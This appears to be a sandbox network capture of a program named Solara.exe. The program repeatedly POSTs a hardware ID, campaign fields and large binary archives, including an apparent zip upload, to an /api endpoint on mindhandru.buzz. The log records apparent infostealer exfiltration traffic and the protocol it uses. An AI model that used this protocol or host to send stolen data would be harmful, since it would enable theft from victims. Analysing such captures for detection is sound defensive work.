                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 59 59 33 74 58 42 31 37 61 54 48 61 56 51 49 6e 61 75 67 71 6f 39 32 2f 50 39 63 69 49 71 54 46 4b 63 4d 6e 57 70 79 48 77 42 62 6c 69 36 61 41 30 66 67 72 63 68 34 55 67 37 53 70 61 37 6c 79 57 36 64 37 56 71 49 73 63 77 55 35 78 79 58 63 52 4a 50 57 51 58 44 4a 38 56 58 49 50 6a 71 6b 54 77 4d 57 63 2b 6c 75 4f 57 49 4c 64 65 74 45 73 75 6a 33 68 4f 42 63 75 49 6b 51 42 30 59 52 59 59 33 78 47 42 57 7a 35 54 33 65 30 45 58 30 2b 4c 32 74 49 39 67 68 62 42 55 6b 49 79 64 48 50 39 7a 69 32 70 66 58 46 59 56 70 44 75 46 51 47 66 34 75 34 52 4a 54 42 37 63 38 2f 43 79 77 47 48 72 69 54 57 49 2b 35 31 53 2f 78 53 58 5a 41 63 59 48 78 58 4a 61 4e 6b 56 4e 62 33 39 6d 54 78 64 56 38 53 6c 39 75 57 58 66 49 76 2f 42 6f 6a 74 6e 52 4f 38 58 74 63 73 52 41 6f 4e
                                                                                                                                    Data Ascii: YY3tXB17aTHaVQInaugqo92/P9ciIqTFKcMnWpyHwBbli6aA0fgrch4Ug7Spa7lyW6d7VqIscwU5xyXcRJPWQXDJ8VXIPjqkTwMWc+luOWILdetEsuj3hOBcuIkQB0YRYY3xGBWz5T3e0EX0+L2tI9ghbBUkIydHP9zi2pfXFYVpDuFQGf4u4RJTB7c8/CywGHriTWI+51S/xSXZAcYHxXJaNkVNb39mTxdV8Sl9uWXfIv/BojtnRO8XtcsRAoN


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.449735172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:02 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=DUA4BN7M2HKUX0SZMMZ
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 18173
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:02 UTC15331OUTData Raw: 2d 2d 44 55 41 34 42 4e 37 4d 32 48 4b 55 58 30 53 5a 4d 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 36 42 39 35 38 32 30 30 38 37 30 32 39 38 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 44 55 41 34 42 4e 37 4d 32 48 4b 55 58 30 53 5a 4d 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 55 41 34 42 4e 37 4d 32 48 4b 55 58 30 53 5a 4d 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32
                                                                                                                                    Data Ascii: --DUA4BN7M2HKUX0SZMMZContent-Disposition: form-data; name="hwid"8B6B958200870298D0F23BE3BFA4D7B0--DUA4BN7M2HKUX0SZMMZContent-Disposition: form-data; name="pid"2--DUA4BN7M2HKUX0SZMMZContent-Disposition: form-data; name="lid"yau6Na--62
                                                                                                                                    2024-12-27 15:21:02 UTC2842OUTData Raw: b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa
                                                                                                                                    Data Ascii: e,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
                                                                                                                                    2024-12-27 15:21:03 UTC1126INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:21:03 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=r73ei6igf73q7cogibbn2c227b; expires=Tue, 22 Apr 2025 09:07:42 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9sKWUfDGHbDIFj1TL0F4ePwD53wb9fIEzG3ohSMHWm8ZWo6ryBMkHCVj8VFf8m7uLUike8EHLoPu9sl0j%2BFdh6oUONAWwYWzSMbj0p6wdAD5XGDHUNAT0b%2F68EeRPzEYEk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c4feca54232-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1749&rtt_var=661&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19135&delivery_rate=1669525&cwnd=217&unsent_bytes=0&cid=80c1e5a3fd0f3297&ts=1070&x=0"
                                                                                                                                    2024-12-27 15:21:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-27 15:21:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.449736172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:04 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=QBD10WBWROF7
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 8752
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:04 UTC8752OUTData Raw: 2d 2d 51 42 44 31 30 57 42 57 52 4f 46 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 36 42 39 35 38 32 30 30 38 37 30 32 39 38 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 51 42 44 31 30 57 42 57 52 4f 46 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 42 44 31 30 57 42 57 52 4f 46 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 51 42 44 31 30 57 42 57 52 4f
                                                                                                                                    Data Ascii: --QBD10WBWROF7Content-Disposition: form-data; name="hwid"8B6B958200870298D0F23BE3BFA4D7B0--QBD10WBWROF7Content-Disposition: form-data; name="pid"2--QBD10WBWROF7Content-Disposition: form-data; name="lid"yau6Na--629912535--QBD10WBWRO
                                                                                                                                    2024-12-27 15:21:05 UTC1129INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:21:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=p4fj3rklf8r8vlvrcb6idb0c8g; expires=Tue, 22 Apr 2025 09:07:44 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeBahTySeGFf2qh7xMVehFS1rIubHreIs%2BL2qDX3Y44QC3u%2B1sYY%2FIIYLQSr7w8UE5QJi3G3n%2FyB4w31xngTWpGcb%2BsAWrypmkmmsUfqqo8r0NGi1dTLwTEQN7UtZKpv5GQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c5eeb285e5f-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=614&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9684&delivery_rate=1781574&cwnd=251&unsent_bytes=0&cid=aa7dbd0846cd0a37&ts=866&x=0"
                                                                                                                                    2024-12-27 15:21:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-27 15:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.449737172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:07 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=4V5NXPZBSP7Q7O7
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 20423
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:07 UTC15331OUTData Raw: 2d 2d 34 56 35 4e 58 50 5a 42 53 50 37 51 37 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 36 42 39 35 38 32 30 30 38 37 30 32 39 38 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 34 56 35 4e 58 50 5a 42 53 50 37 51 37 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 56 35 4e 58 50 5a 42 53 50 37 51 37 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 34
                                                                                                                                    Data Ascii: --4V5NXPZBSP7Q7O7Content-Disposition: form-data; name="hwid"8B6B958200870298D0F23BE3BFA4D7B0--4V5NXPZBSP7Q7O7Content-Disposition: form-data; name="pid"3--4V5NXPZBSP7Q7O7Content-Disposition: form-data; name="lid"yau6Na--629912535--4
                                                                                                                                    2024-12-27 15:21:07 UTC5092OUTData Raw: 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                    2024-12-27 15:21:08 UTC1128INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:21:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=13f4eagcovpkrcdm8qqd94ul6c; expires=Tue, 22 Apr 2025 09:07:46 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2gySWqonA5mgzA8XmfjscTNxJMqlH0T%2FRD5THLomVNf9xkKvsyPFYIZZt9bhxn%2FoWgvGJmKMCB2he09EzBR%2BhK5ElCHNl0LZJRaIXm1961wA50CyubzQEPAUahxG6ZIRoqg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c6d5dec6a52-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2355&min_rtt=2079&rtt_var=977&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21381&delivery_rate=1404521&cwnd=210&unsent_bytes=0&cid=66f919c55e9e2264&ts=1009&x=0"
                                                                                                                                    2024-12-27 15:21:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-27 15:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.449738172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:09 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=826W8W5G6DW
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 1228
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:09 UTC1228OUTData Raw: 2d 2d 38 32 36 57 38 57 35 47 36 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 36 42 39 35 38 32 30 30 38 37 30 32 39 38 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 38 32 36 57 38 57 35 47 36 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 32 36 57 38 57 35 47 36 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 38 32 36 57 38 57 35 47 36 44 57 0d 0a
                                                                                                                                    Data Ascii: --826W8W5G6DWContent-Disposition: form-data; name="hwid"8B6B958200870298D0F23BE3BFA4D7B0--826W8W5G6DWContent-Disposition: form-data; name="pid"1--826W8W5G6DWContent-Disposition: form-data; name="lid"yau6Na--629912535--826W8W5G6DW
                                                                                                                                    2024-12-27 15:21:10 UTC1120INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:21:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=od2qhikf1rjtktekhijhs8af01; expires=Tue, 22 Apr 2025 09:07:49 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSTR7TfwY1t7HSdW1OV%2BdqMxHSsncoiAElxkJ1HIq8ehvjI00AtFm2Taw9Iy3dozQkVz3MFJdtsbtxooClqt0jPOO2PyCHOBsJqV0bZej1KYAZcfHrQs4kTX8aK4vLRfutw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c7d8fda1885-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1705&rtt_var=689&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2137&delivery_rate=1712609&cwnd=193&unsent_bytes=0&cid=95c314159586a99a&ts=791&x=0"
                                                                                                                                    2024-12-27 15:21:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-27 15:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.449739172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:12 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=IWMGITR0XK6E94L5X
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 570559
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:12 UTC15331OUTData Raw: 2d 2d 49 57 4d 47 49 54 52 30 58 4b 36 45 39 34 4c 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 36 42 39 35 38 32 30 30 38 37 30 32 39 38 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 49 57 4d 47 49 54 52 30 58 4b 36 45 39 34 4c 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 57 4d 47 49 54 52 30 58 4b 36 45 39 34 4c 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33
                                                                                                                                    Data Ascii: --IWMGITR0XK6E94L5XContent-Disposition: form-data; name="hwid"8B6B958200870298D0F23BE3BFA4D7B0--IWMGITR0XK6E94L5XContent-Disposition: form-data; name="pid"1--IWMGITR0XK6E94L5XContent-Disposition: form-data; name="lid"yau6Na--62991253
                                                                                                                                    2024-12-27 15:21:12 UTC15331OUTData Raw: e0 49 9c 12 90 f2 e6 bf ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47
                                                                                                                                    Data Ascii: I"]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H36:PG
                                                                                                                                    2024-12-27 15:21:12 UTC15331OUTData Raw: 4f 0b 15 09 2f 16 46 34 ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0
                                                                                                                                    Data Ascii: O/F4DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=H
                                                                                                                                    2024-12-27 15:21:12 UTC15331OUTData Raw: 50 4b af ee 2d 9a a8 3a 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78
                                                                                                                                    Data Ascii: PK-:4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx
